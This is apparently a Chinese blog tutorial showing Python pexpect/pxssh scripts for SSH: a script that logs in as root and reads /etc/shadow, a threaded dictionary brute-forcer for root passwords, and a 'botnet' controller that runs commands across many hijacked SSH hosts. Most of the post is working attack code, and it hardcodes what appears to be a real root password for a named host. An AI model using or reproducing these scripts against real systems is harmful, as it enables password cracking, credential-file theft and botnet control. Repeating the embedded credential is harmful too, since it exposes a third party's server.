利用python连接并控制SSH

使用pexpect来连接ssh

(该工具只能在linux下使用)

python连接ssh并且执行命令,显示输出结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#!/usr/bin/python
import pexpect
PROMPT = ['# ','>>> ','> ','\$ ']
def send_command(child,cmd):
child.sendline(cmd)
child.expect(PROMPT)
print child.before

def connect(user,host,password):
ssh_newkey = 'Are you sure you want to continue connecting (yes/no)?'
connStr = 'ssh ' + user + '@' + host
child = pexpect.spawn(connStr)
ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
if ret == 0:
print '[-] Error Connecting'
return
if ret ==1:
print "send yes to server!\n"
child.sendline('yes')
ret = child.expect([pexpect.TIMEOUT,'[P|p]assword: '])
if ret == 0:
print '[-] Error Connecting'
return
child.sendline(password)
child.expect(PROMPT)
return child
ss = connect("root","heiyiren.top","heiyiren312429020!@#")
send_command(ss,'cat /etc/shadow | grep root')

使用 pxssh来暴力破解密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/usr/bin/python
from pexpect import pxssh
PROMPT = ['# ','>>> ','> ','\$ ']
def send_command(child,cmd):
child.sendline(cmd)
child.prompt()
print child.before

def connect(user,host,password):
try:
s = pxssh.pxssh()
s.login(host,user,password)
print "[+] Password Found : " +password
return s
except Exception as e:
pass

ss = connect("root","heiyiren.top","xxxxxx")
send_command(ss,'cat /etc/shadow | grep root')

这里需要引用一个 BoundedSemaphore 信号量

该信号量是一个PV操作,具体使用代码:

connection_lock = BoundedSemaphore(value=maxConnections)
connection_lock.acquire() 进入临界区,最多使用maxConnections-=1次,第六次使用的时候会保持等待状态,等到执行了release之后才可以继续使用
connection_lock.release() 离开临界区,maxConnections+=1,当其大于初始的 maxConnections 会发生异常

利用字典暴力破解密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
#!/usr/bin/python
from pexpect import pxssh
from threading import *
import time
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
fails = 0
def connect(host,user,passwd,release):
global Found
global Fails
try:
s = pxssh.pxssh()
s.login(host,user,passwd)
Found = True
print "[+] Found Password: "+passwd

except Exception as e:
if 'read_nunblocking' in str(e):
fails = fails + 1
time.sleep(5)
connect(host,user,passwd,false)
elif 'synchronize with original prompt' in str(e):
time.sleep(1)
connect(host,user,passwd,false)
finally:
if release:
connection_lock.release()
def main():
global Found
with open("password","r") as f :
for i in f.readlines():
if Found:
print "[*] Exiting : Password Found"
exit(0)
if fails > 5 :
print "[!] Exiting : Too Many Socket Timeouts"
exit(0)
i = i.strip("\n").strip("\r")
connection_lock.acquire()
print "[-] Testing password :" + i
t = Thread(target=connect,args=("heiyiren.top","root",i,True))
t.start()
if __name__ == '__main__':
main()

可以升级,对IP地址,用户和密码文件进行指定,而不是在代码中写死,但重点工作已完成。

编写脚本控制强大的僵尸网络

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/usr/bin/python
from pexpect import pxssh


class Client:
def __init__(self,host,user,passwd):
self.host = host
self.user = user
self.passwd = passwd
self.session = self.connect()
def connect(self):
try:
s = pxssh.pxssh()
s.login(self.host,self.user,self.passwd)
return s
except Exception as e:
print '[-] host:'+self.host+' except. reason:',e
def send_command(self,cmd):
self.session.sendline(cmd)
self.session.prompt()
return self.session.before
def botnet_command(cmd):
for client in botNet:
output = client.send_command(cmd)
print '[*] Output from ' + client.host
print '[+] ' + output + '\n'
def addClient(host,user,password):
client = Client(host,user,password)
botNet.append(client)
botNet = []
#addClient("127.0.0.1","root","toor")
addClient("heiyiren.top","root","xxxxxx")
botnet_command('uname -v')

当然,代码还缺少对Client连接是否成功的检查,自行补全 :)